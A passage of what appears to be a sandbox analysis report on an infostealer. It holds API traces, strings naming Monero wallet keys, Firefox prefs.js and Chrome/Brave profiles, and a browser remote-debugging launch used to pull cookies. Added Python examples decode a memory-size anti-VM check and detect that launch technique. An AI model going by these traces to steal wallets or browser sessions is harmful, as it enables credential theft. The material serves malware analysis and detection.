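# the report: block ids, address ranges, call/API annotations and "a->b" edges.
RAW_CFG = (
    "control_flow_graph 1493 4c1220-4c1247 call 4d8b40 GlobalMemoryStatusEx "
    "1496 4c1249-4c1271 call 4ddd30 * 2 1493->1496 1497 4c1273-4c127a 1493->1497 "
    "1498 4c1281-4c1285 1496->1498 1497->1498 1500 4c129a-4c129d 1498->1500 "
    "1501 4c1287 1498->1501 1503 4c1289-4c1290 1501->1503 "
    "1504 4c1292-4c1294 ExitProcess 1501->1504 1503->1500 1503->1504"
)

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
BLOCK_ID_RE = re.compile(r"^\d+$")
RANGE_RE = re.compile(r"^[0-9a-f]+(?:-[0-9a-f]+)?$")
API_RE = re.compile(r"^[A-Z][A-Za-z0-9]{2,}$")   # exported WinAPI names, e.g. ExitProcess


def parse_cfg(raw):
    """Parse one flattened line into ({id: {start, end, annot}}, [(src, dst), ...])."""
    tokens = raw.split()
    if not tokens or tokens[0] != "control_flow_graph":
        raise ValueError("not a flattened control_flow_graph line")
    blocks, edges, current, i = {}, [], None, 1
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE_RE.match(tok)
        if edge:
            edges.append((int(edge.group(1)), int(edge.group(2))))
            i += 1
            continue
        # Block header: an id followed by a hex range. Ids grow monotonically in the
        # export (assumption), which keeps "call 4ddd30 * 2" from being misread.
        if (BLOCK_ID_RE.match(tok) and i + 1 < len(tokens)
                and RANGE_RE.match(tokens[i + 1])
                and (current is None or int(tok) > current)):
            lo, _, hi = tokens[i + 1].partition("-")
            current = int(tok)
            blocks[current] = {"start": int(lo, 16), "end": int(hi or lo, 16), "annot": []}
            i += 2
            continue
        if current is None:
            raise ValueError(f"annotation before any block: {tok!r}")
        blocks[current]["annot"].append(tok)   # "call", "4ddd30", "*", "2", API names ...
        i += 1
    return blocks, edges


def apis_in(block):
    return [t for t in block["annot"] if API_RE.match(t)]


def entry_block(blocks):
    """Block with the lowest start address (the sandbox lists blocks in address order)."""
    return min(blocks, key=lambda b: blocks[b]["start"])


def exit_blocks(blocks):
    return sorted(b for b in blocks if "ExitProcess" in apis_in(blocks[b]))


def exit_paths(blocks, edges):
    """All simple paths from the entry block to a block that calls ExitProcess."""
    succ = defaultdict(list)
    for src, dst in edges:
        succ[src].append(dst)
    exits, found, entry = set(exit_blocks(blocks)), [], entry_block(blocks)

    def walk(node, path):
        if node in exits:
            found.append(path)          # ExitProcess does not return: path ends here
            return
        for nxt in succ[node]:
            if nxt not in path:         # ignore loops
                walk(nxt, path + [nxt])

    walk(entry, [entry])
    return found


def gating_apis(blocks, edges):
    """APIs called on every path to ExitProcess: the only results the exit can depend on."""
    paths = exit_paths(blocks, edges)
    if not paths:
        return set()
    per_path = [{api for b in p for api in apis_in(blocks[b])} - {"ExitProcess"} for p in paths]
    return set.intersection(*per_path)


if __name__ == "__main__":
    blocks, edges = parse_cfg(RAW_CFG)
    for p in exit_paths(blocks, edges):
        print(" -> ".join(f"{b}@{blocks[b]['start']:x}" for b in p))
    print("exit gated by:", gating_apis(blocks, edges))
```

For this function all four exit paths start in block 1493, so the only API whose result can drive ExitProcess is GlobalMemoryStatusEx; the two calls to 4ddd30 in block 1496 sit on only half of the paths and are therefore not the gate.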
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004D7AA0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004D7AA7
                              • GetComputerNameA.KERNEL32(?,00000104), ref: 004D7ABF
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: b56c89d92b0d5cbde3093c2993e14816f3b3cf1f3b28efd194873838fd361cb5
                              • Instruction ID: b11c0244aeb8252798b55efb45da9adf8af2dd116aa7d8f60894d2a4a66e901e
                              • Opcode Fuzzy Hash: b56c89d92b0d5cbde3093c2993e14816f3b3cf1f3b28efd194873838fd361cb5
                              • Instruction Fuzzy Hash: 120181B1A58249ABC704CF99DD45BAFBBB8FB04711F10426BF505E2380E7B85A00CBA5
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 004C112B
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 004C1132
                              • ExitProcess.KERNEL32 ref: 004C1143
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$AllocCurrentExitNumaVirtual
                              • String ID:
                              • API String ID: 1103761159-0
                              • Opcode ID: beb5256bfdef267c5ea51c975d8850b2a760226f7c08bdf6318259b6fa84e64d
                              • Instruction ID: c319d739bc9f269bd6e0eafa148edee84cc956b95b4c840e7f3d505cab9ef8ad
                              • Opcode Fuzzy Hash: beb5256bfdef267c5ea51c975d8850b2a760226f7c08bdf6318259b6fa84e64d
                              • Instruction Fuzzy Hash: 9EE0867099930CFBE7545B919D0AF0D7678AB04B15F10405BF708761D0C6BC2540865C
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 004C10B3
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 004C10F7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: 7d36e8c33297eae9a2a14bba04c1f428a80494986cc4ffa7f79aa96063d04225
                              • Instruction ID: e8f7239ce6529aa610ea3e3d206c5877dd72b7ea11e9ff9f6e7cff857ed622c5
                              • Opcode Fuzzy Hash: 7d36e8c33297eae9a2a14bba04c1f428a80494986cc4ffa7f79aa96063d04225
                              • Instruction Fuzzy Hash: F9F0E971641208BBE71496A59C59FAFB798E705B05F30444AF500E7390D5759E00C668
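The VirtualAllocExNuma and VirtualAlloc/VirtualFree records above list raw stack dwords. The Python below is an added example, not part of the report: it parses the report's "APIs" lines and names and decodes the memory-API arguments against the documented prototypes. That turns 17C841C0 into 399,000,000 bytes (about 380 MiB) committed PAGE_READWRITE and immediately released, a size probe of the kind used to trip analysis VMs with little RAM. The five values shown on the GetCurrentProcess line fit the VirtualAllocExNuma prototype once the process handle is prepended (the sandbox records whatever is on the stack at the call site), so the example also decodes them as that call's pending arguments; that attribution is an interpretation, as is the MEM_RELEASE warning, which follows from the documented requirement that dwSize be zero for that flag. The sample lines are copied from the page.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# "APIs" lines copied from the report (nothing added); the sandbox records the
# dwords on the stack at the call site, so extra trailing values are stale slots.
SAMPLE_LINES = [
    "• GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 004C112B",
    "• VirtualAllocExNuma.KERNEL32(00000000), ref: 004C1132",
    "• ExitProcess.KERNEL32 ref: 004C1143",
    "• VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 004C10B3",
    "• VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 004C10F7",
    "  • Part of subcall function 004D7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 004D7ABF",
]

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
HEX_RE = re.compile(r"^[0-9A-Fa-f]{1,16}$")

# Documented Win32 constants (memoryapi.h / winnt.h).
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x4000: "MEM_DECOMMIT",
             0x8000: "MEM_RELEASE", 0x100000: "MEM_TOP_DOWN", 0x400000: "MEM_PHYSICAL",
             0x20000000: "MEM_LARGE_PAGES"}
PAGE_PROT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
             0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
             0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
             0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE"}
# Documented prototypes, used to name the recorded stack slots.
PROTOTYPES = {
    "VirtualAlloc": ("lpAddress", "dwSize", "flAllocationType", "flProtect"),
    "VirtualAllocExNuma": ("hProcess", "lpAddress", "dwSize", "flAllocationType",
                           "flProtect", "nndPreferred"),
    "VirtualFree": ("lpAddress", "dwSize", "dwFreeType"),
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]          # raw tokens as printed: hex dwords, "?" or a string argument
    ref: int                 # call-site address
    subcall_of: Optional[int] = None


def parse_api_line(line: str) -> ApiCall:
    m = LINE_RE.match(line)
    if not m:
        raise ValueError(f"unrecognised API line: {line!r}")
    args = m.group("args").split(",") if m.group("args") else []
    sub = int(m.group("sub"), 16) if m.group("sub") else None
    return ApiCall(m.group("name"), m.group("module"), args, int(m.group("ref"), 16), sub)


def as_int(raw: str) -> Optional[int]:
    return int(raw, 16) if HEX_RE.match(raw) else None   # "?" and string args -> None


def flag_names(value: int, table: dict) -> List[str]:
    names = [name for bit, name in sorted(table.items()) if value & bit]
    unknown = value & ~sum(table)                          # bits the table does not cover
    if unknown:
        names.append(hex(unknown))
    return names


def decode_memory_call(name: str, raw_args: List[str]) -> dict:
    """Name the slots per prototype and decode sizes/flags; {} for non-memory APIs."""
    proto = PROTOTYPES.get(name)
    if proto is None:
        return {}
    out = {slot: as_int(raw) for slot, raw in zip(proto, raw_args)}
    if out.get("dwSize") is not None:
        out["size_mib"] = round(out["dwSize"] / 2 ** 20, 1)
    if out.get("flAllocationType") is not None:
        out["flAllocationType"] = flag_names(out["flAllocationType"], MEM_FLAGS)
    if out.get("flProtect") is not None:
        out["flProtect"] = flag_names(out["flProtect"], PAGE_PROT)
    if out.get("dwFreeType") is not None:
        out["dwFreeType"] = flag_names(out["dwFreeType"], MEM_FLAGS)
        if "MEM_RELEASE" in out["dwFreeType"] and out.get("dwSize"):
            out["warning"] = ("VirtualFree requires dwSize == 0 with MEM_RELEASE; "
                              "the recorded size is probably a stale stack slot")
    return out


if __name__ == "__main__":
    calls = [parse_api_line(l) for l in SAMPLE_LINES]
    for c in calls:
        print(f"{c.ref:08X} {c.name}.{c.module}", decode_memory_call(c.name, c.args))
    # Interpretation: the stack snapshot on the GetCurrentProcess line holds the
    # arguments already pushed for the VirtualAllocExNuma call that follows it.
    print("VirtualAllocExNuma:", decode_memory_call("VirtualAllocExNuma", ["?"] + calls[0].args))
```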
                              APIs
                                • Part of subcall function 004D7A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004D7AA0
                                • Part of subcall function 004D7A70: RtlAllocateHeap.NTDLL(00000000), ref: 004D7AA7
                                • Part of subcall function 004D7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 004D7ABF
                                • Part of subcall function 004D79E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004C11B7), ref: 004D7A10
                                • Part of subcall function 004D79E0: RtlAllocateHeap.NTDLL(00000000), ref: 004D7A17
                                • Part of subcall function 004D79E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 004D7A2F
                              • ExitProcess.KERNEL32 ref: 004C11C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AllocateName$ComputerExitUser
                              • String ID:
                              • API String ID: 3550813701-0
                              • Opcode ID: a78f05f22a69ea905ae9b6a0aa6ec7fe013bf8aca33d9d935de71477723401e0
                              • Instruction ID: 73447664d4ae14533b1f056c1461103620ccbb0a50a47755648d5069a644f96f
                              • Opcode Fuzzy Hash: a78f05f22a69ea905ae9b6a0aa6ec7fe013bf8aca33d9d935de71477723401e0
                              • Instruction Fuzzy Hash: EAE0ECA691420553DA1473BA6C27F2B329C5B1534EF04441FFA0482312FD2DF801816D
                              APIs
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                                • Part of subcall function 004DAC30: lstrcpy.KERNEL32(00000000,?), ref: 004DAC82
                                • Part of subcall function 004DAC30: lstrcat.KERNEL32(00000000), ref: 004DAC92
                                • Part of subcall function 004DACC0: lstrlen.KERNEL32(?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004DACD5
                                • Part of subcall function 004DACC0: lstrcpy.KERNEL32(00000000), ref: 004DAD14
                                • Part of subcall function 004DACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004DAD22
                                • Part of subcall function 004DABB0: lstrcpy.KERNEL32(?,004E0E1A), ref: 004DAC15
                              • FindFirstFileA.KERNEL32(00000000,?,004E0B32,004E0B2F,00000000,?,?,?,004E1450,004E0B2E), ref: 004CBEC5
                              • StrCmpCA.SHLWAPI(?,004E1454), ref: 004CBF33
                              • StrCmpCA.SHLWAPI(?,004E1458), ref: 004CBF49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004CC8A9
                              • FindClose.KERNEL32(000000FF), ref: 004CC8BB
                              Strings
                              • --remote-debugging-port=9229 --profile-directory=", xrefs: 004CC534
                              • \Brave\Preferences, xrefs: 004CC1C1
                              • --remote-debugging-port=9229 --profile-directory=", xrefs: 004CC495
                              • --remote-debugging-port=9229 --profile-directory=", xrefs: 004CC3B2
                              • Google Chrome, xrefs: 004CC6F8
                              • Preferences, xrefs: 004CC104
                              • Brave, xrefs: 004CC0E8
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 3334442632-1869280968
                              • Opcode ID: 881372a9dc6031e15ac5a4c8933a0ee3433439c4459a98a7318d48aab74359b3
                              • Instruction ID: f2f283af510d3f9d70c9f8054188bfeb8b51b1bb5041d5ff0c5dd6c0a1377f64
                              • Opcode Fuzzy Hash: 881372a9dc6031e15ac5a4c8933a0ee3433439c4459a98a7318d48aab74359b3
                              • Instruction Fuzzy Hash: B25292725101089BCB14FB61DCA6FEE737DAF44304F00459FB50A66291EE38AB59CF6A
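The strings in the record above (--remote-debugging-port=9229 --profile-directory=" next to Brave, Google Chrome and Preferences) show the sample starting Chromium-based browsers with the DevTools remote-debugging port open, which lets it pull cookies and session data from the live browser over the DevTools protocol instead of decrypting the on-disk stores. The Python below is an added detection example, not from the report: it scans process-creation events (fields modelled on Sysmon Event ID 1; the events are constructed, not captured) for a browser launched with a remote-debugging flag and reports the parent, transport, port and profile. The allow-list of parents that legitimately attach DevTools is an assumed tuning knob for the environment.

```python
import ntpath
import re

# Constructed process-creation events (Sysmon Event ID 1 style), not from the report.
# Events 1 and 4 mirror what the strings above produce when file.exe launches a browser.
SAMPLE_EVENTS = [
    {"parent": r"C:\Users\victim\AppData\Local\Temp\file.exe",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" '
                r'--remote-debugging-port=9229 --profile-directory="Default"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": r'"C:\Program Files\Google\Chrome\Application\chrome.exe"'},
    {"parent": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US'},
    {"parent": r"C:\Users\victim\AppData\Local\Temp\file.exe",
     "image": r"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe",
     "cmdline": r'"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" '
                r'--remote-debugging-port=9229 --profile-directory="Profile 1"'},
    {"parent": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "cmdline": r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-pipe'},
]

CHROMIUM_BROWSERS = {"chrome.exe", "brave.exe", "msedge.exe", "opera.exe", "vivaldi.exe", "chromium.exe"}
# Assumed allow-list of parents that legitimately attach DevTools; tune per environment.
DEBUG_TOOL_PARENTS = {"code.exe", "devenv.exe"}

DEBUG_RE = re.compile(r"--remote-debugging-(port|pipe)(?:=(\d+))?", re.IGNORECASE)
PROFILE_RE = re.compile(r'--profile-directory=(?:"([^"]*)"|(\S+))', re.IGNORECASE)


def inspect_event(event):
    """Return a finding dict for a browser started with remote debugging, else None."""
    image = ntpath.basename(event["image"]).lower()
    if image not in CHROMIUM_BROWSERS:
        return None
    dbg = DEBUG_RE.search(event["cmdline"])
    if not dbg:
        return None                      # normal launch, renderer/gpu children, etc.
    parent = ntpath.basename(event["parent"]).lower()
    prof = PROFILE_RE.search(event["cmdline"])
    profile = (prof.group(1) or prof.group(2)) if prof else None
    return {
        "browser": image,
        "parent": parent,
        "transport": dbg.group(1).lower(),                   # "port" or "pipe"
        "port": int(dbg.group(2)) if dbg.group(2) else None,
        "profile": profile,                                  # which cookie jar is targeted
        "severity": "low" if parent in DEBUG_TOOL_PARENTS else "high",
    }


def scan(events):
    return [f for f in (inspect_event(e) for e in events) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

A port-based launch from an unsigned binary in a user-writable path, as in the first and fourth events, is the Stealc case; the same rule fires at low severity for a developer tool so the baseline can be reviewed rather than silently dropped. Pair it with a network rule for loopback connections to the chosen port, since the debugging endpoint is plain HTTP/WebSocket on 127.0.0.1.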
                              APIs
                              • wsprintfA.USER32 ref: 004D3B1C
                              • FindFirstFileA.KERNEL32(?,?), ref: 004D3B33
                              • lstrcat.KERNEL32(?,?), ref: 004D3B85
                              • StrCmpCA.SHLWAPI(?,004E0F58), ref: 004D3B97
                              • StrCmpCA.SHLWAPI(?,004E0F5C), ref: 004D3BAD
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004D3EB7
                              • FindClose.KERNEL32(000000FF), ref: 004D3ECC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 1125553467-2524465048
                              • Opcode ID: 0cef91712425a6b9877f5e9369b8135be0d64e3b292e385837bdca58ee33a5e2
                              • Instruction ID: c538426ba31d750e38aff2b8387c0ef9579f9e4fa33454377533d996f58cb128
                              • Opcode Fuzzy Hash: 0cef91712425a6b9877f5e9369b8135be0d64e3b292e385837bdca58ee33a5e2
                              • Instruction Fuzzy Hash: DDA17472A102089BCB24DF64DC95FEA7379BB44301F04858FB60D96281DB78AB85CF5A
                              APIs
                              • wsprintfA.USER32 ref: 004D4B7C
                              • FindFirstFileA.KERNEL32(?,?), ref: 004D4B93
                              • StrCmpCA.SHLWAPI(?,004E0FC4), ref: 004D4BC1
                              • StrCmpCA.SHLWAPI(?,004E0FC8), ref: 004D4BD7
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004D4DCD
                              • FindClose.KERNEL32(000000FF), ref: 004D4DE2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s$%s\%s$%s\*
                              • API String ID: 180737720-445461498
                              • Opcode ID: 3bab97331adb53480871b3401480602de6b58fad6786ecff031871a15df998e9
                              • Instruction ID: 3c674a0395c7b39e36eb9820348a24757720cef8452f68d72603446e63655b44
                              • Opcode Fuzzy Hash: 3bab97331adb53480871b3401480602de6b58fad6786ecff031871a15df998e9
                              • Instruction Fuzzy Hash: AD616B71510118ABCB24EBA0DC55FEA737CBB88705F00858FF60996151EB78EB85CF99
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004D47D0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004D47D7
                              • wsprintfA.USER32 ref: 004D47F6
                              • FindFirstFileA.KERNEL32(?,?), ref: 004D480D
                              • StrCmpCA.SHLWAPI(?,004E0FAC), ref: 004D483B
                              • StrCmpCA.SHLWAPI(?,004E0FB0), ref: 004D4851
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004D48DB
                              • FindClose.KERNEL32(000000FF), ref: 004D48F0
                              • lstrcat.KERNEL32(?,012AE7A8), ref: 004D4915
                              • lstrcat.KERNEL32(?,012ADC00), ref: 004D4928
                              • lstrlen.KERNEL32(?), ref: 004D4935
                              • lstrlen.KERNEL32(?), ref: 004D4946
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                              • String ID: %s\%s$%s\*
                              • API String ID: 671575355-2848263008
                              • Opcode ID: be67f0b1d1fff4fff85ae492ee9ce89e3d5c8d786f2ba328b49e2a41ee0f0694
                              • Instruction ID: 632954da3eb8178411b6cbfa08e5f27f2882bdcb4b72670463d0ee5679d78e55
                              • Opcode Fuzzy Hash: be67f0b1d1fff4fff85ae492ee9ce89e3d5c8d786f2ba328b49e2a41ee0f0694
                              • Instruction Fuzzy Hash: 5851A8B5550208ABCB24EB70DC99FEE737CAB58300F00858FB64996150EB78DB85CF99
                              APIs
                              • wsprintfA.USER32 ref: 004D4113
                              • FindFirstFileA.KERNEL32(?,?), ref: 004D412A
                              • StrCmpCA.SHLWAPI(?,004E0F94), ref: 004D4158
                              • StrCmpCA.SHLWAPI(?,004E0F98), ref: 004D416E
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004D42BC
                              • FindClose.KERNEL32(000000FF), ref: 004D42D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 180737720-4073750446
                              • Opcode ID: 75674b0dc4bb19eab0417de65ca6f84632ab8ac116fe854aabda93d5dcc211c3
                              • Instruction ID: e60ec004e6c31e4b04ab6493f837b244cfc673104c134e057e005b2ecd1ce7c5
                              • Opcode Fuzzy Hash: 75674b0dc4bb19eab0417de65ca6f84632ab8ac116fe854aabda93d5dcc211c3
                              • Instruction Fuzzy Hash: 125164B1514118ABCB24EBB0DC95FEA737CBB48304F00868FB65996150DB78AB85CF58
                              APIs
                              • wsprintfA.USER32 ref: 004CEE3E
                              • FindFirstFileA.KERNEL32(?,?), ref: 004CEE55
                              • StrCmpCA.SHLWAPI(?,004E1630), ref: 004CEEAB
                              • StrCmpCA.SHLWAPI(?,004E1634), ref: 004CEEC1
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004CF3AE
                              • FindClose.KERNEL32(000000FF), ref: 004CF3C3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 180737720-1013718255
                              • Opcode ID: a574fea81d6b9a05c23c54b60754c05780d98679f5cabb3d529d2ed50d9b0c1b
                              • Instruction ID: 5be1ca03525de85cddfd9dc590da23ac6318d8859646c100127bae78dbb8e6c5
                              • Opcode Fuzzy Hash: a574fea81d6b9a05c23c54b60754c05780d98679f5cabb3d529d2ed50d9b0c1b
                              • Instruction Fuzzy Hash: EBE17F729111189BDB14FB61CC72EEE7379AF50304F0045DFB10A62292EE386B9ACF59
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                              • API String ID: 0-1562099544
                              • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                              • Instruction ID: 41c7afdd4ac702e8c6fa3cbb40fcb51a693891bfedce7e876f74b5a1eb2560f6
                              • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                              • Instruction Fuzzy Hash: 5EE276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                              APIs
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                                • Part of subcall function 004DAC30: lstrcpy.KERNEL32(00000000,?), ref: 004DAC82
                                • Part of subcall function 004DAC30: lstrcat.KERNEL32(00000000), ref: 004DAC92
                                • Part of subcall function 004DACC0: lstrlen.KERNEL32(?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004DACD5
                                • Part of subcall function 004DACC0: lstrcpy.KERNEL32(00000000), ref: 004DAD14
                                • Part of subcall function 004DACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004DAD22
                                • Part of subcall function 004DABB0: lstrcpy.KERNEL32(?,004E0E1A), ref: 004DAC15
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004E16B0,004E0D97), ref: 004CF81E
                              • StrCmpCA.SHLWAPI(?,004E16B4), ref: 004CF86F
                              • StrCmpCA.SHLWAPI(?,004E16B8), ref: 004CF885
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004CFBB1
                              • FindClose.KERNEL32(000000FF), ref: 004CFBC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: prefs.js
                              • API String ID: 3334442632-3783873740
                              • Opcode ID: cd490cb18eecc3122bb07f4529e6dd0ab4f76dd2ae0367ad2e7e810dca879a74
                              • Instruction ID: 41278d9dfd3e9d8e15af931bee11e81a046909b41410bb11d5af9902758c1f5b
                              • Opcode Fuzzy Hash: cd490cb18eecc3122bb07f4529e6dd0ab4f76dd2ae0367ad2e7e810dca879a74
                              • Instruction Fuzzy Hash: 2FB195719101189BCB24FF61CCA6FEE7379AF44304F0085AFA50A57251EF386B59CB9A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: w_$"8cF$5~]/$Cc)Q$E{[$R<#$bPe~$mJ>=$>b?$C_=$T?
                              • API String ID: 0-456953326
                              • Opcode ID: caebcb32a53543207288d2bfffb9a862fa308a7b38fcdbb4f7369208881bd15d
                              • Instruction ID: e3b697e21489845cfb0b4c33e1e3dd246958cabcae445400b69d1487c9e9ce0a
                              • Opcode Fuzzy Hash: caebcb32a53543207288d2bfffb9a862fa308a7b38fcdbb4f7369208881bd15d
                              • Instruction Fuzzy Hash: 49B246F3A0C3049FE304AE2DEC8567ABBE9EB94720F1A453DE6C5C3744E93598058687
                              APIs
